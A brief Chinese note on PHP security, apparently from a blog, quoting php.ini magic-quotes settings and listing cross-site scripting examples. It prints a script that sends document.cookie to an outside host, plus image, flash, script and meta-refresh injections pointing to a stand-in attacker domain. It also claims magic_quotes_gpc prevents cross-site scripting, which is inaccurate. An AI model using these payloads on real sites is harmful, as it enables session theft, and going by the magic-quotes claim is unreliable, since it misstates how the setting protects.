php安全

; Magic quotes for incoming GET/POST/Cookie data.
; 设置成On可避免跨站攻击
magic_quotes_gpc = On

 

; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc.
magic_quotes_runtime = Off

 

; Use Sybase-style magic quotes (escape ' with '' instead of \').

;设置成On可以将'专成''
magic_quotes_sybase = Off

 

获取cookie

<script>window.open("http://www.wufeng.com/cookie.php?cookies="+document.cookie);</script>

 

避免跨站攻击可以使用:htmlentities 函数

 

图片攻击:<IMG SRC="http://hax0r.com/Haxored.png">

或者视频flash:<EMBED SRC= http://hax0r.com/Haxored.swf

还有网站重定向:<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

也可以:<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />

绕过字符过滤

你可能感兴趣的:(html,sql,PHP,Flash,Sybase)